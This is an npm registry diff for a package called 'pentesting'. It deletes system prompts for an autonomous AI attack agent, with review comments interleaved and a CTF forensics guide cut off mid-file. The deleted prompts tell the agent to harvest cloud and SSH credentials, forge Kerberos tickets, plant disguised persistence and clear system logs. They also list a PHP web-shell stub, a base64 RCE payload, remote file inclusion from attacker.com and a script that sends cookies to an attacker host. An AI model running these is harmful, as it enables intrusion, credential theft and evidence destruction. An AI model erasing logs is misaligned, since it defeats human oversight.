pentesting 0.73.13 → 0.90.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (70)
  1. package/README.md +120 -44
  2. package/bin/pentesting.mjs +32 -0
  3. package/lib/runtime.mjs +419 -0
  4. package/package.json +17 -46
  5. package/scripts/postinstall.mjs +30 -0
  6. package/scripts/preflight-local.sh +24 -0
  7. package/dist/ad/prompt.md +0 -60
  8. package/dist/agent-tool-KHXXTHGS.js +0 -989
  9. package/dist/api/prompt.md +0 -63
  10. package/dist/chunk-4UNNRHYY.js +0 -5797
  11. package/dist/chunk-GILD75OT.js +0 -11407
  12. package/dist/chunk-S5ZMXFHR.js +0 -1162
  13. package/dist/cloud/prompt.md +0 -49
  14. package/dist/container/prompt.md +0 -58
  15. package/dist/database/prompt.md +0 -58
  16. package/dist/email/prompt.md +0 -44
  17. package/dist/file-sharing/prompt.md +0 -56
  18. package/dist/ics/prompt.md +0 -76
  19. package/dist/main.d.ts +0 -1
  20. package/dist/main.js +0 -9777
  21. package/dist/network/prompt.md +0 -49
  22. package/dist/persistence-U2N3KWFH.js +0 -13
  23. package/dist/process-registry-4Y3HB4YQ.js +0 -30
  24. package/dist/prompts/base.md +0 -436
  25. package/dist/prompts/ctf-crypto.md +0 -168
  26. package/dist/prompts/ctf-forensics.md +0 -182
  27. package/dist/prompts/ctf-pwn.md +0 -137
  28. package/dist/prompts/evasion.md +0 -215
  29. package/dist/prompts/exploit.md +0 -416
  30. package/dist/prompts/infra.md +0 -114
  31. package/dist/prompts/llm/analyst-system.md +0 -76
  32. package/dist/prompts/llm/context-extractor-system.md +0 -19
  33. package/dist/prompts/llm/input-processor-system.md +0 -64
  34. package/dist/prompts/llm/memory-synth-system.md +0 -14
  35. package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
  36. package/dist/prompts/llm/reflector-system.md +0 -16
  37. package/dist/prompts/llm/report-generator-system.md +0 -21
  38. package/dist/prompts/llm/strategist-fallback.md +0 -9
  39. package/dist/prompts/llm/triage-system.md +0 -47
  40. package/dist/prompts/main-agent.md +0 -193
  41. package/dist/prompts/offensive-playbook.md +0 -250
  42. package/dist/prompts/payload-craft.md +0 -181
  43. package/dist/prompts/post.md +0 -185
  44. package/dist/prompts/recon.md +0 -296
  45. package/dist/prompts/report.md +0 -98
  46. package/dist/prompts/strategist-system.md +0 -472
  47. package/dist/prompts/strategy.md +0 -163
  48. package/dist/prompts/techniques/README.md +0 -40
  49. package/dist/prompts/techniques/ad-attack.md +0 -261
  50. package/dist/prompts/techniques/auth-access.md +0 -256
  51. package/dist/prompts/techniques/container-escape.md +0 -103
  52. package/dist/prompts/techniques/crypto.md +0 -296
  53. package/dist/prompts/techniques/enterprise-pentest.md +0 -175
  54. package/dist/prompts/techniques/file-attacks.md +0 -144
  55. package/dist/prompts/techniques/forensics.md +0 -313
  56. package/dist/prompts/techniques/injection.md +0 -217
  57. package/dist/prompts/techniques/lateral.md +0 -128
  58. package/dist/prompts/techniques/network-svc.md +0 -229
  59. package/dist/prompts/techniques/pivoting.md +0 -205
  60. package/dist/prompts/techniques/privesc.md +0 -190
  61. package/dist/prompts/techniques/pwn.md +0 -595
  62. package/dist/prompts/techniques/reversing.md +0 -183
  63. package/dist/prompts/techniques/sandbox-escape.md +0 -73
  64. package/dist/prompts/techniques/shells.md +0 -194
  65. package/dist/prompts/vuln.md +0 -190
  66. package/dist/prompts/web.md +0 -318
  67. package/dist/prompts/zero-day.md +0 -298
  68. package/dist/remote-access/prompt.md +0 -52
  69. package/dist/web/prompt.md +0 -59
  70. package/dist/wireless/prompt.md +0 -62
@@ -1,175 +0,0 @@
1
- # Enterprise Pentest — Internal Network Autonomous Assessment
2
-
3
- > **§3 Minimal Specification**: This is a **Bootstrap Reference**, not a prescribed order.
4
- > Adapt based on `get_state`, attack graph observations, and live target behavior.
5
- > **Cross-ref**: ad-attack.md (AD attacks), pivoting.md (lateral movement), zero-day.md (C4)
6
-
7
- ---
8
-
9
- ## Core Principle
10
-
11
- ```
12
- Enterprise environments = layered defense + network segmentation + centralized AD + cloud integration
13
-
14
- Priority:
15
- 1. Map internal network first → identify segments, DCs, critical services
16
- 2. Maximize lateral movement with captured credentials
17
- 3. AD domain → Forest compromise for full privilege escalation
18
- 4. Cloud (AWS/Azure/GCP) pivoting to complete hybrid environment takeover
19
- ```
20
-
21
- ---
22
-
23
- ## Phase 1: Internal Network Enumeration (Immediately after foothold)
24
-
25
- ```
26
- SEGMENT DISCOVERY (run immediately after first shell):
27
- ├── ip a / ifconfig → network interfaces + IP ranges
28
- ├── ip route / netstat -rn → routing table → internal subnet list
29
- ├── arp -a → directly connected hosts
30
- ├── cat /etc/hosts → internal hostname mappings
31
- └── cat /etc/resolv.conf → internal DNS server → domain enumeration base
32
-
33
- ADJACENT SUBNET SCAN:
34
- nmap -sn 10.x.x.0/24
35
- for sub in $(seq 1 20); do nmap -sn 10.$sub.0.0/24; done
36
-
37
- DNS ENUMERATION:
38
- dig axfr @internal_dns domain.corp
39
- dnsrecon -d corp.local -t axfr
40
- for i in $(seq 1 254); do host 10.x.x.$i; done | grep "domain name pointer"
41
- ```
42
-
43
- ---
44
-
45
- ## Phase 2: Critical Internal Service Discovery
46
-
47
- ```
48
- CRITICAL SERVICES TO FIND:
49
- ┌─────────────────────────────────────────────────────────────────────┐
50
- │ Service Port Attack Vector │
51
- ├─────────────────────────────────────────────────────────────────────┤
52
- │ Active Directory DC 88/389/636 Kerberos/LDAP/LDAPS │
53
- │ SCCM/WSUS 8530/8531 Privilege escalation, malicious │
54
- │ update delivery │
55
- │ Exchange/Mail 25/443 Internal phishing, relay attacks │
56
- │ Corporate CA (ADCS) 80/443 ESC1~13 ADCS vulnerabilities │
57
- │ Jump Host/Bastion 22/3389 Lateral movement hub │
58
- │ Database servers 1433/3306/5432 Credential reuse + data dump │
59
- │ DevOps infra 8080/9000 Jenkins/SonarQube weak auth → │
60
- │ code execution │
61
- │ Cloud Metadata 169.254.169.254 IAM credential access │
62
- └─────────────────────────────────────────────────────────────────────┘
63
-
64
- SCCM ATTACKS (Enterprise-specific):
65
- 1. net group "SMS Admins" /domain → SCCM administrator list
66
- 2. Extract SCCM NAA (Network Access Account) credentials
67
- 3. Tools: SCCMHunter, SharpSCCM
68
- web_search("SCCM attack lateral movement credential extraction {year}")
69
-
70
- EXCHANGE ATTACKS:
71
- 1. ProxyShell/ProxyLogon: check CVE → run PoC
72
- 2. NTLM relay: responder + ntlmrelayx → capture Exchange auth
73
- 3. EWS (Exchange Web Services): ruler, EWSoauth
74
- ```
75
-
76
- ---
77
-
78
- ## Phase 3: AD Forest Attacks (after single domain compromise)
79
-
80
- ```
81
- FOREST TRUST EXPLOITATION:
82
- ├── Discover trust relationships:
83
- │ nltest /domain_trusts
84
- │ PowerView: Get-DomainTrust
85
-
86
- ├── SID History attack (cross-forest movement):
87
- │ - Current domain DA → target forest Enterprise Admin
88
- │ - mimikatz lsadump::trust /patch → extract trust key
89
- │ - kerberos::golden /user:Administrator /domain:corp.local
90
- │ /sid:S-1-5-21-... /sids:S-1-5-21-TARGET-519 /rc4:TRUSTKEY
91
-
92
- ├── External Trust → Kerberoast across trust:
93
- │ Get-DomainUser -Domain external.corp -SPN
94
- │ Invoke-Kerberoast -Domain external.corp | Export-CSV
95
-
96
- └── SID Filtering bypass:
97
- web_search("SID filtering bypass forest trust attack {year}")
98
-
99
- ENTERPRISE ADMIN PATHS:
100
- 1. Achieve DA in all domains → target Enterprise Admin directly
101
- 2. Schema Admin path → AD schema modification
102
- 3. Corp CA (ADCS) ESC6/ESC8 → Enterprise Admin certificate
103
- ```
104
-
105
- ---
106
-
107
- ## Phase 4: Cloud Pivoting (Hybrid environments)
108
-
109
- ```
110
- ON-PREM → CLOUD PIVOT:
111
-
112
- Credential sources:
113
- env | grep -iE "aws|azure|gcp|secret|key|token"
114
- find / -name "*.env" -o -name "credentials" -o -name "*.pem" -o -name "*.json" 2>/dev/null
115
- cat ~/.aws/credentials ~/.azure/credentials ~/.config/gcloud/credentials.db
116
-
117
- AWS ESCALATION:
118
- aws sts get-caller-identity → current identity
119
- aws iam list-attached-user-policies → current permissions
120
- aws iam list-roles → assumable roles
121
- aws sts assume-role --role-arn arn:... → privilege escalation
122
- → Goal: AdministratorAccess policy acquisition
123
- web_search("AWS privilege escalation IAM misconfiguration {year}")
124
-
125
- AZURE ESCALATION:
126
- az login --use-device-code (or use stolen token)
127
- az account list → accessible subscriptions
128
- az vm list → VM inventory
129
- az keyvault secret list --vault-name ... → dump secrets
130
- Managed Identity → az role assignment list → check permissions
131
- web_search("Azure privilege escalation managed identity {year}")
132
-
133
- GCP ESCALATION:
134
- gcloud auth list → authenticated accounts
135
- gcloud projects list → accessible projects
136
- gcloud iam service-accounts list → service account list
137
- gcloud compute instances list → VM inventory
138
- web_search("GCP privilege escalation service account {year}")
139
-
140
- IMDS (Instance Metadata Service) attack:
141
- AWS: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
142
- Azure: curl -H "Metadata:true" http://169.254.169.254/metadata/identity/oauth2/token
143
- GCP: curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
144
- -H "Metadata-Flavor:Google"
145
- ```
146
-
147
- ---
148
-
149
- ## Phase 5: Long-term Persistence
150
-
151
- ```
152
- ENTERPRISE PERSISTENCE (minimize detection risk):
153
- ├── Domain level: Golden Ticket (10-year validity) → exfiltrate krbtgt hash offline
154
- ├── Silver Ticket: service-specific TGS → permanent access to specific service
155
- ├── Scheduled task: schtasks /create /tn "WindowsUpdate" /tr ... /sc daily (disguised)
156
- ├── WMI persistence: wmic /namespace:\\root\subscription event handler
157
- └── Cloud: backdoor IAM user / Lambda trigger / Lambda persistence
158
-
159
- EVIDENCE CLEANUP (post-detection):
160
- Windows: wevtutil cl System; wevtutil cl Security; wevtutil cl Application
161
- Linux: echo -n > /var/log/auth.log; history -c; unset HISTFILE
162
- Note: Log deletion itself is an IOC — minimal footprint is the guiding principle
163
- ```
164
-
165
- ---
166
-
167
- ## Search Patterns
168
-
169
- ```
170
- web_search("enterprise pentest internal network lateral movement {year}")
171
- web_search("SCCM attack chain privilege escalation credential extraction {year}")
172
- web_search("AD forest trust attack SID filtering bypass Enterprise Admin {year}")
173
- web_search("cloud AWS Azure GCP privilege escalation IAM misconfiguration {year}")
174
- web_search("Exchange server ProxyShell ProxyLogon {version} exploit")
175
- ```
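Review bot: the Phase 5 block of this deleted prompt ("EVIDENCE CLEANUP (post-detection)") directs the agent to run `wevtutil cl Security` and truncate `/var/log/auth.log`, which is anti-forensic tampering outside any authorized assessment's rules of engagement and contradicts the file's own note that log deletion is itself an IOC, so removing it is the right outcome; whatever replaces these prompts should state that log clearing is out of scope and is to be reported, not performed. Two points on the removal itself: the header's cross-references (ad-attack.md, pivoting.md, zero-day.md) are all deleted in this same version per the file list, so no dangling links remain, but the diff adds `scripts/postinstall.mjs` and `lib/runtime.mjs` while dropping every `dist/prompts/*.md` and the compiled `dist/*.js`, which suggests prompt and agent logic now arrives at install or run time rather than in the published tarball; the package.json and postinstall hunks should be reviewed for what is fetched and from where, since a registry diff no longer shows it.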
@@ -1,144 +0,0 @@
1
- # File-Based Attacks — Comprehensive Autonomous Guide
2
-
3
- > **Cross-ref**: injection.md (for injection via files), shells.md (web shells), evasion.md (filter bypass)
4
-
5
- ## Core Principle
6
- Files are one of the most powerful attack vectors. There are dozens of file-based
7
- attack techniques, each with hundreds of bypass variants. Search and adapt.
8
-
9
- ## File Attack Type Map
10
-
11
- ```
12
- FILE-BASED ATTACK CATEGORIES:
13
-
14
- ├── 1. Local File Inclusion (LFI)
15
- │ ├── Basic: ../../etc/passwd, ....//....//etc/passwd
16
- │ ├── Null byte: ../../etc/passwd%00 (PHP < 5.3.4)
17
- │ ├── Double encoding: %252e%252e%252f
18
- │ ├── UTF-8 overlong: %c0%ae%c0%ae/
19
- │ ├── Wrappers (PHP): php://filter, php://input, data://, expect://, zip://, phar://
20
- │ │ ├── Read source: php://filter/read=convert.base64-encode/resource=config.php
21
- │ │ ├── RCE: php://input + POST body with PHP code
22
- │ │ ├── RCE: data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOz8+
23
- │ │ ├── RCE: expect://id (if expect wrapper enabled)
24
- │ │ └── RCE: phar://malicious.phar (deserialization via phar metadata)
25
- │ ├── Windows: ..\..\windows\system32\drivers\etc\hosts
26
- │ ├── Interesting files to read:
27
- │ │ ├── Linux: /etc/passwd, /etc/shadow, /proc/self/environ, /proc/self/cmdline
28
- │ │ ├── Web: /var/www/html/.env, wp-config.php, config.php, database.yml
29
- │ │ ├── SSH: /home/*/.ssh/id_rsa, /root/.ssh/id_rsa
30
- │ │ ├── Logs: /var/log/apache2/access.log (for log poisoning → RCE)
31
- │ │ ├── Proc: /proc/self/fd/N (leaked file descriptors)
32
- │ │ └── Windows: C:\Windows\win.ini, C:\boot.ini, web.config
33
- │ └── LFI → RCE CHAINS:
34
- │ ├── Log poisoning: inject PHP via User-Agent → include apache/nginx log
35
- │ ├── /proc/self/environ: inject PHP via User-Agent/Referer header
36
- │ ├── PHP session files: inject into session → include /tmp/sess_SESSIONID
37
- │ ├── Temp files: race condition upload → include before cleanup
38
- │ ├── Mail log: send email with PHP code → include /var/mail/www-data
39
- │ └── web_search("LFI to RCE techniques {year}")
40
-
41
- ├── 2. Remote File Inclusion (RFI)
42
- │ ├── Basic: ?page=http://attacker.com/shell.txt
43
- │ ├── Requires: allow_url_include=On (PHP)
44
- │ ├── Protocol: http://, https://, ftp://
45
- │ ├── Null byte bypass: ?page=http://attacker.com/shell.txt%00
46
- │ └── Often disabled — check and try, but LFI is more common
47
-
48
- ├── 3. Path Traversal (Directory Traversal)
49
- │ ├── Basic: ../../../etc/passwd
50
- │ ├── Encoded: %2e%2e%2f, %2e%2e/, ..%2f
51
- │ ├── Double encoded: %252e%252e%252f
52
- │ ├── Unicode: ..%c0%af, ..%ef%bc%8f
53
- │ ├── Oversized: ....//, ....\/
54
- │ ├── Absolute path: /etc/passwd (if app blindly prepends dir)
55
- │ ├── Null byte: ../etc/passwd%00.png (bypass extension checks)
56
- │ ├── In API parameters, cookies, headers, file names, ZIP entries
57
- │ └── Use payload_mutate with context="path" for systematic variants
58
-
59
- ├── 4. File Upload Attacks
60
- │ ├── BYPASS CATEGORIES (try ALL when blocked):
61
- │ │ ├── Extension bypass:
62
- │ │ │ ├── Double extension: shell.php.jpg, shell.jpg.php
63
- │ │ │ ├── Alternative extensions: .php3, .php4, .php5, .phtml, .phar, .phps
64
- │ │ │ ├── Case: .PHP, .Php, .pHp
65
- │ │ │ ├── Special chars: shell.php%00.jpg, shell.php\x00.jpg, shell.php;.jpg
66
- │ │ │ ├── Dot trailing: shell.php., shell.php..
67
- │ │ │ ├── Space: shell.php (with trailing space)
68
- │ │ │ └── web_search("file upload extension bypass {language}")
69
- │ │ │
70
- │ │ ├── Content-Type bypass:
71
- │ │ │ ├── Change Content-Type to image/jpeg, image/png, image/gif
72
- │ │ │ └── Keep malicious content, fake the content-type header
73
- │ │ │
74
- │ │ ├── Magic bytes bypass:
75
- │ │ │ ├── GIF89a<?php system($_GET['cmd']); ?> (GIF header)
76
- │ │ │ ├── \xFF\xD8\xFF\xE0 + PHP code (JPEG header)
77
- │ │ │ ├── \x89PNG\r\n\x1a\n + PHP code (PNG header)
78
- │ │ │ └── Prepend legitimate file header to malicious code
79
- │ │ │
80
- │ │ ├── Server processing bypass:
81
- │ │ │ ├── .htaccess upload: AddType application/x-httpd-php .jpg
82
- │ │ │ ├── web.config upload (IIS): handlers → execute aspx
83
- │ │ │ ├── Polyglot files: valid image AND valid PHP/JSP/ASP
84
- │ │ │ └── Filename manipulation: shell.php%20, shell.php::$DATA (Windows ADS)
85
- │ │ │
86
- │ │ └── Race condition:
87
- │ │ ├── Upload → access before validation/deletion
88
- │ │ ├── Write script for concurrent upload + access
89
- │ │ └── web_search("file upload race condition exploit")
90
- │ │
91
- │ ├── POST-UPLOAD EXPLOITATION:
92
- │ │ ├── Access uploaded shell: try common upload dirs
93
- │ │ │ /uploads/, /images/, /media/, /files/, /tmp/, /static/
94
- │ │ ├── If path unknown: LFI to find path, or fuzz the upload directory
95
- │ │ └── Upgrade web shell to reverse shell (see shells.md)
96
- │ │
97
- │ └── SEARCH PATTERN:
98
- │ web_search("file upload bypass techniques {year}")
99
- │ web_search("{framework} file upload vulnerability")
100
- │ web_search("file upload {defense} bypass")
101
-
102
- ├── 5. ZIP/Archive Attacks
103
- │ ├── Zip Slip: path traversal in archive (../../../etc/cron.d/evil)
104
- │ ├── ZIP symlink: include symlink to /etc/passwd → extracted by server
105
- │ ├── ZIP bomb: denial of service (if relevant)
106
- │ ├── Polyglot ZIP: valid ZIP + valid PHP
107
- │ └── web_search("zip slip vulnerability exploitation")
108
-
109
- ├── 6. Symlink Attacks
110
- │ ├── Create symlink to sensitive file → access through web
111
- │ ├── Race condition: symlink swap between check and use (TOCTOU)
112
- │ ├── Git symlink: include symlink in git repo → checkout reads target file
113
- │ └── Relevant in: file upload, archive extraction, temp file operations
114
-
115
- ├── 7. Server-Side Processing Attacks
116
- │ ├── ImageMagick (ImageTragick): web_search("imagemagick exploit CVE-2016-3714")
117
- │ │ ├── SVG with embedded commands
118
- │ │ ├── MVG file format exploitation
119
- │ │ └── Ghostscript exploitation
120
- │ ├── FFmpeg: SSRF via HLS playlist, local file read
121
- │ ├── LibreOffice: macro execution, SSRF via document links
122
- │ ├── PDF generators (wkhtmltopdf, dompdf): SSRF, XSS, local file read
123
- │ │ ├── <iframe src="file:///etc/passwd">
124
- │ │ ├── <script>document.location="http://attacker/?"+document.cookie</script>
125
- │ │ └── web_search("{pdf_generator} SSRF local file read")
126
- │ └── Document parsers: DOCX/XLSX (XXE via embedded XML), CSV injection
127
-
128
- └── 8. SSRF via File Operations
129
- ├── URL parameter → file:///etc/passwd, gopher://, dict://
130
- ├── Cloud metadata: http://169.254.169.254/latest/meta-data/
131
- ├── Internal services: http://localhost:6379/ (Redis), http://localhost:9200/ (Elastic)
132
- └── See web.md SSRF section for comprehensive SSRF methodology
133
- ```
134
-
135
- ## 🧠 File Attack Search Patterns
136
- ```
137
- web_search("LFI to RCE {language} {framework} techniques")
138
- web_search("file upload bypass {defense} {year}")
139
- web_search("path traversal {application} CVE")
140
- web_search("{file_type} polyglot {language}")
141
- web_search("file inclusion wrapper {language}")
142
- web_search("PayloadsAllTheThings file inclusion")
143
- web_search("PayloadsAllTheThings upload")
144
- ```
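Review bot: this deleted tree embeds ready-to-use payload strings as static text (the `GIF89a<?php system($_GET['cmd']); ?>` stub under "Magic bytes bypass", the base64 `data://` PHP payload under "Wrappers", and the `.htaccess` `AddType` line), which is exactly the content that makes an npm tarball trip antivirus and SCA scanners on install, so dropping it from dist/ is sound. One documentation point to carry into whatever replaces it: `payload_mutate` and `web_search` are invoked as agent tools throughout the file with no definition of their contract, and the cross-referenced injection.md, shells.md and evasion.md are removed in the same diff, so the tool interface needs to be documented somewhere that survives this change rather than implied by prompt text.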
@@ -1,313 +0,0 @@
1
- # Forensics & Steganography — Comprehensive CTF Guide
2
-
3
- > **Cross-ref**: file-attacks.md (file operations), pwn.md (binary analysis)
4
-
5
- ## Phase 0: File Analysis — Universal First Steps
6
-
7
- ```
8
- With ANY unknown file:
9
- ├── file <file> → identify type (NEVER trust extension alone!)
10
- ├── strings <file> → extract readable strings
11
- ├── strings -el <file> → UTF-16 strings (Windows executables)
12
- ├── xxd <file> | head → hex dump first bytes (check magic bytes)
13
- ├── exiftool <file> → metadata (GPS, creator, timestamps, hidden fields)
14
- ├── binwalk <file> → embedded files/filesystems
15
- │ └── binwalk -e <file> → extract embedded files
16
- ├── foremost <file> → file carving (alternative to binwalk)
17
- └── entropy analysis:
18
- binwalk -E <file> → high entropy = encrypted/compressed
19
-
20
- Magic bytes quick reference:
21
- ├── 89 50 4E 47 → PNG
22
- ├── FF D8 FF → JPEG
23
- ├── 47 49 46 38 → GIF
24
- ├── 50 4B 03 04 → ZIP (also DOCX, XLSX, APK, JAR)
25
- ├── 1F 8B → GZIP
26
- ├── 42 5A 68 → BZIP2
27
- ├── 7F 45 4C 46 → ELF (Linux binary)
28
- ├── 4D 5A → PE (Windows executable)
29
- ├── 25 50 44 46 → PDF
30
- ├── D0 CF 11 E0 → MS Office (OLE2) — DOC, XLS, PPT
31
- ├── 52 49 46 46 → RIFF (WAV, AVI, WebP)
32
- └── 00 00 00 18/20 → MP4 (ftyp)
33
-
34
- File repair:
35
- ├── Corrupted header? → fix magic bytes manually with hex editor
36
- ├── PNG: pngcheck -v <file> → diagnose chunk errors
37
- │ Fix CRC: python3 script to recalculate chunk CRC
38
- │ Fix IHDR: width/height may be wrong → brute-force dimensions
39
- ├── ZIP: zip -FF corrupt.zip --out fixed.zip → repair archive
40
- └── JPEG: truncated? → might still have flag in extractable data
41
- ```
42
-
43
- ## Steganography
44
-
45
- ```
46
- ═══════════════════════════════════════
47
- Image Steganography:
48
- ═══════════════════════════════════════
49
-
50
- JPEG:
51
- ├── steghide extract -sf <image.jpg> -p "" → try empty password first
52
- ├── steghide extract -sf <image.jpg> -p <pw> → with password
53
- ├── stegseek <image.jpg> rockyou.txt → brute force steghide password
54
- ├── stegcracker <image.jpg> rockyou.txt → alternative brute force
55
- ├── jsteg reveal <image.jpg> → jsteg extraction
56
- └── outguess -r <image.jpg> output.txt → outguess extraction
57
-
58
- PNG / BMP:
59
- ├── zsteg <image.png> → LSB analysis (multiple channels, orders)
60
- ├── zsteg -a <image.png> → try ALL extraction methods
61
- ├── pngcheck -v <image.png> → PNG structure validation
62
- ├── IDAT chunks: hidden data after IEND marker
63
- │ python3 -c "data=open('img.png','rb').read(); print(data[data.index(b'IEND')+8:])"
64
- ├── LSB manual extraction:
65
- │ from PIL import Image
66
- │ img = Image.open('img.png')
67
- │ bits = ''.join(str(px & 1) for px in img.getdata() for _ in [px] if isinstance(px, int))
68
- │ # or for RGB: iterate R,G,B channels separately
69
- └── Compare two similar images:
70
- compare <img1> <img2> diff.png (ImageMagick)
71
- → pixel differences often reveal hidden data
72
-
73
- GIF:
74
- ├── Multiple frames may hide data across frames
75
- ├── identify -verbose <file.gif> → frame count
76
- ├── convert <file.gif> frame_%d.png → extract all frames
77
- └── Hidden frame with very short display time
78
-
79
- General image:
80
- ├── StegSolve.jar → visual analysis (bit plane viewer, color channels)
81
- ├── CyberChef: Extract LSB
82
- ├── Compare file size to expected → hidden data appended
83
- └── Check alpha channel (transparency) for hidden data
84
- from PIL import Image
85
- img = Image.open('img.png').split()[-1] # alpha channel
86
-
87
- ═══════════════════════════════════════
88
- Audio Steganography:
89
- ═══════════════════════════════════════
90
- ├── Audacity → spectrogram view (Analyze → Plot Spectrum or View → Spectrogram)
91
- │ Hidden images/text visible in frequency domain
92
- ├── sonic-visualiser → detailed spectrogram layers
93
- ├── DTMF decoder → phone dial tones (multimon-ng)
94
- ├── morse-decoder → morse code in audio
95
- ├── wav hidden data:
96
- │ python3 → read raw samples → LSB extraction
97
- │ stegolsb wavsteg -r -i audio.wav -o output.txt
98
- ├── SSTV (Slow-Scan Television):
99
- │ qsstv or RX-SSTV → decode image from audio signal
100
- │ Common in space/radio-themed CTFs
101
- └── mp3stego → MP3-specific steganography
102
-
103
- ═══════════════════════════════════════
104
- Text / Document Steganography:
105
- ═══════════════════════════════════════
106
- ├── Whitespace stego: stegsnow -C <file>
107
- │ Tabs and spaces encode binary data at end of lines
108
- ├── Zero-width characters: Unicode U+200B, U+200C, U+200D, U+FEFF
109
- │ cat -v <file> | grep -o '\xE2\x80[\x8B-\x8F]' → detect
110
- ├── Homoglyph attacks: visually identical but different Unicode chars
111
- │ 'а' (Cyrillic) vs 'a' (Latin) → different bytes
112
- ├── Line-ending manipulation: CRLF vs LF patterns encode bits
113
- ├── PDF steganography:
114
- │ ├── pdf-parser.py <file.pdf> → analyze objects
115
- │ ├── Hidden JavaScript: /JavaScript, /JS keys
116
- │ ├── Embedded files in PDF streams
117
- │ ├── Invisible text (white on white)
118
- │ └── pdftotext <file.pdf> → extract all text
119
- └── Office documents (DOCX/XLSX):
120
- ├── unzip <file.docx> → extract XML contents
121
- ├── Hidden text (white font, tiny size)
122
- ├── Document properties / custom metadata
123
- └── Embedded OLE objects / macros
124
- ```
125
-
126
- ## Network Forensics (PCAP)
127
-
128
- ```
129
- ═══════════════════════════════════════
130
- Wireshark / tshark analysis:
131
- ═══════════════════════════════════════
132
- ├── tshark -r file.pcap -T fields -e data → raw data extraction
133
- ├── tshark -r file.pcap -Y "http" -T fields -e http.request.uri
134
- ├── tshark -r file.pcap -Y "ftp" -T fields -e ftp.request.arg
135
- ├── Follow TCP stream: tcp.stream eq <N>
136
- ├── Export HTTP objects: File → Export Objects → HTTP
137
- └── Statistics → Protocol Hierarchy → see what protocols are used
138
-
139
- ═══════════════════════════════════════
140
- Common PCAP patterns in CTF:
141
- ═══════════════════════════════════════
142
- ├── HTTP: credentials in POST, file downloads, flag in response
143
- ├── FTP: RETR/STOR commands → extract transferred files
144
- │ tshark -r file.pcap -Y "ftp-data" -T fields -e data | xxd -r -p > extracted
145
- ├── DNS exfiltration:
146
- │ ├── Subdomain encoding: base64/hex data in query names
147
- │ ├── TXT records containing hidden data
148
- │ └── tshark -r file.pcap -Y "dns.qry.type==16" -T fields -e dns.txt
149
- ├── ICMP tunneling:
150
- │ ├── Data hidden in ICMP payload (ping data section)
151
- │ └── tshark -r file.pcap -Y "icmp" -T fields -e data
152
- ├── TLS/SSL:
153
- │ ├── If RSA private key available: edit → preferences → TLS → RSA keys
154
- │ ├── If SSLKEYLOGFILE available: set in TLS preferences → pre-master secret log
155
- │ └── Check for self-signed certs, weak ciphers, heartbleed
156
- ├── USB keyboard capture:
157
- │ ├── tshark -r file.pcap -Y "usb.transfer_type==0x01" -T fields -e usbhid.data
158
- │ └── Map HID keycodes to characters (0x04=a, 0x05=b, ...)
159
- ├── WiFi (802.11):
160
- │ ├── aircrack-ng file.pcap -w rockyou.txt → crack WPA
161
- │ └── airdecap-ng -p <password> file.pcap → decrypt traffic
162
- └── Custom protocols:
163
- ├── Unknown ports → analyze payload patterns manually
164
- └── Scapy: rdpcap('file.pcap') → programmatic analysis
165
-
166
- ═══════════════════════════════════════
167
- Key Wireshark filters:
168
- ═══════════════════════════════════════
169
- ├── http.request.method == "POST" → credential submissions
170
- ├── ftp.request.command == "PASS" → FTP passwords
171
- ├── smtp contains "AUTH" → email credentials
172
- ├── tcp.flags.syn == 1 → connection attempts
173
- ├── frame contains "flag" → direct flag search
174
- ├── !(arp || dns || mdns) → filter noise
175
- ├── ip.addr == 10.0.0.1 → specific host traffic
176
- └── tcp.port == 4444 → specific port (reverse shell?)
177
- ```
178
-
179
- ## Memory Forensics
180
-
181
- ```
182
- ═══════════════════════════════════════
183
- Volatility 3 (preferred):
184
- ═══════════════════════════════════════
185
- Profile detection:
186
- ├── vol3 -f memory.dmp banners.Banners → detect OS
187
- ├── vol3 -f memory.dmp windows.info → Windows version info
188
- └── vol3 -f memory.dmp linux.bash → Linux bash history
189
-
190
- Key plugins — Windows:
191
- ├── vol3 -f memory.dmp windows.pslist → process list
192
- ├── vol3 -f memory.dmp windows.pstree → process tree
193
- ├── vol3 -f memory.dmp windows.cmdline → command history
194
- ├── vol3 -f memory.dmp windows.filescan → file handles in memory
195
- ├── vol3 -f memory.dmp windows.dumpfiles → extract files
196
- │ --pid <PID> → filter by process
197
- ├── vol3 -f memory.dmp windows.hashdump → SAM password hashes → crack with hashcat!
198
- ├── vol3 -f memory.dmp windows.netscan → network connections
199
- ├── vol3 -f memory.dmp windows.registry.hivelist → registry hives
200
- ├── vol3 -f memory.dmp windows.registry.printkey → dump registry key
201
- ├── vol3 -f memory.dmp windows.malfind → detect injected code
202
- ├── vol3 -f memory.dmp windows.envars → environment variables (FLAG!)
203
- └── vol3 -f memory.dmp windows.clipboard → clipboard content
204
-
205
- Key plugins — Linux:
206
- ├── vol3 -f memory.dmp linux.pslist → processes
207
- ├── vol3 -f memory.dmp linux.bash → bash history (FLAG!)
208
- ├── vol3 -f memory.dmp linux.check_syscall → rootkit detection
209
- ├── vol3 -f memory.dmp linux.proc.Maps → memory maps
210
- └── strings memory.dmp | grep -i "flag\|password\|secret\|key"
211
-
212
- ═══════════════════════════════════════
213
- Volatility 2 (older workflow):
214
- ═══════════════════════════════════════
215
- ├── vol.py -f memory.dmp imageinfo → determine profile
216
- ├── vol.py -f memory.dmp --profile=<P> pslist
217
- ├── vol.py -f memory.dmp --profile=<P> hashdump
218
- ├── vol.py -f memory.dmp --profile=<P> mimikatz → credential extraction
219
- ├── vol.py -f memory.dmp --profile=<P> memdump -p <PID> -D output/
220
- └── vol.py -f memory.dmp --profile=<P> timeliner → timeline analysis
221
-
222
- ═══════════════════════════════════════
223
- Quick wins in memory forensics:
224
- ═══════════════════════════════════════
225
- ├── 1. strings + grep for flag patterns FIRST (fastest!)
226
- ├── 2. Process list → suspicious process? → dump its memory
227
- ├── 3. Command history (cmdline/bash) → look for flag manipulation
228
- ├── 4. Environment variables → flag stored in env
229
- ├── 5. Network connections → hidden services, exfiltration
230
- ├── 6. File scan → find flag.txt, secret.txt in memory
231
- ├── 7. Registry → passwords, recent documents, USB history
232
- └── 8. Clipboard → copied passwords/flags
233
- ```
234
-
235
- ## Disk Forensics
236
-
237
- ```
238
- ═══════════════════════════════════════
239
- Disk / Filesystem Analysis:
240
- ═══════════════════════════════════════
241
- ├── fdisk -l disk.img → partition layout
242
- ├── mmls disk.img → partition table (sleuthkit)
243
